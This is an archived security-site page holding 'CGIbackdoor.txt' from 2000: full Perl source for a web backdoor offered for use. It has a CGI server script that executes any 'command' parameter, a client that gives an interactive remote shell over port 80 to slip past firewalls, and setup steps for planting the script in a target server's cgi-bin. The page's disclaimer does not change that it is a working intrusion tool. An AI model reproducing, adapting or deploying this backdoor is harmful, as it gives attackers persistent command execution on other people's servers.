what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

CGIbackdoor.txt

CGIbackdoor.txt
Posted Jun 13, 2000
Authored by Hypoclear | Site hypoclear.cjb.net

CGI Backdoor - Perl based client / server backdoor which communicates over port 80, bypassing many firewalls.

tags | tool, cgi, perl, rootkit
systems | unix
SHA-256 | dde28029afd3db6710f19fa6c3dca7798fdd9aadda96193ca78f74920eeb55ee

CGIbackdoor.txt

Change Mirror Download
CGIbackdoor by hypoclear of lUSt - (Linux Users Strike Today) - 06/09/00

This file includes two PERL scripts: backdoorserver and backdoorclient

This backdoor is very versitile because most firewalls do not block port 80,
hence you can use this to backdoor a server on the unfortunate end of a firewall.

I think a trained monkey can set this thing up, but just in case, I'll walk the newbies
through the setup.

To set this thing up first cut these two scripts and paste then into two different
files. Then 'chmod 755' both of them so they are executable. Then put the server
file into the cgi-bin directory of the server you want to backdoor (or any other
directory that is web accessable and cgi scripts can execute in). Then in the client
file one line needs to be edited. The line which says: my $basedir = "";
change to read: my $basedir = "/cgi-bin/webpath/to/server/program/server_program_name";

Now run the thing: usage: ./backdoorclient -h <back_doored_host>

This has been tested on an IRIX 5.3 box as well as a RedHat 6.0 box.
The client part seems to run on a Windows machine, however, the server as of
now does not (at least on mine).

Any questions, comments, concerns, and especially any bugs reports or improvements
that you would like to see. Feel free to contact me by email at hypoclear@jungle.net.
Please do not bug me that the files aren't working. All email of this nature will be
discarded. However if a genuine bug is found, as I just said, feel free to contact me.
Visit my new homepage: hypoclear.cjb.net

On a final note I would like to add that I am NOT responsible for any harm done with
these programs. The only servers you backdoor should be owned by you unless you have
expressed permission to do so.


---start cut backdoorclient---

#!/usr/bin/perl

# Backdoor over CGI Client
# Coded by hypoclear of lUSt (Linux Users Strike Today)
#
# usage: ./backdoorclient -h <back_doored_host>

use IO::Socket; use Getopt::Std;
getopts('h:');

my $basedir = ""; #add full webpath here to server part, including filename
my $request;
my $past = "";
my $temp = "";
my $host = $opt_h;

if (defined $opt_h) {

while ($request ne "exit")
{
print "$host\$ ";

$request = <STDIN>;
chomp ($request);
$request =~ s/ /%20/g;
$request =~ s/;/%3b/g;

if ($request eq "exit") {print "logout\n"; last;}
print "\n";

if ($request eq "cd"){$past=""}
else{($temp)=split(/%20/,$request);
if ($temp eq "cd")
{$past=$past.$request."%3b";
$request=$past;}
else{$request=$past.$request;}
$request = "echo\"\"\%3b".$request;}

$remote=IO::Socket::INET->new(Proto =>"tcp",
PeerAddr => $host,
PeerPort => "http(80)",);

unless ($remote) {die "can't connect to $host"}
$remote->autoflush(1);

print $remote "GET $basedir?command=$request HTTP/1.0\n\n";
while (<$remote>)
{unless ((/<*>/)||
(/HTTP\/1.*/)||
(/Date:*/)||
(/Server:*/)||
(/Content-type:*/)||
(/Content-Type:*/)||
(/Connection:*/))
{print}}
print "\n";
-close $remote;
}
}
else{die "\nCGI Backdoor by hypoclear\n(Linux Users Strike Today)\n
usage: ./backdoorclient -h <host>\n\n";}


---end cut backdoorclient---


---start cut backdoorserver---

#!/usr/bin/perl
use strict;
use CGI qw(:standard escapeHTML);
print header, start_html("");
if (param()){my $command = param("command");
$command=`$command`; print p("$command\n");}
else {print start_form(); textfield("command");}
print end_html;

---end cut backdoorserver---
Login or Register to add favorites

File Archive:

November 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    16 Files
  • 2
    Nov 2nd
    17 Files
  • 3
    Nov 3rd
    17 Files
  • 4
    Nov 4th
    11 Files
  • 5
    Nov 5th
    0 Files
  • 6
    Nov 6th
    0 Files
  • 7
    Nov 7th
    3 Files
  • 8
    Nov 8th
    59 Files
  • 9
    Nov 9th
    12 Files
  • 10
    Nov 10th
    6 Files
  • 11
    Nov 11th
    11 Files
  • 12
    Nov 12th
    1 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    9 Files
  • 15
    Nov 15th
    33 Files
  • 16
    Nov 16th
    53 Files
  • 17
    Nov 17th
    11 Files
  • 18
    Nov 18th
    14 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    26 Files
  • 22
    Nov 22nd
    22 Files
  • 23
    Nov 23rd
    10 Files
  • 24
    Nov 24th
    9 Files
  • 25
    Nov 25th
    11 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close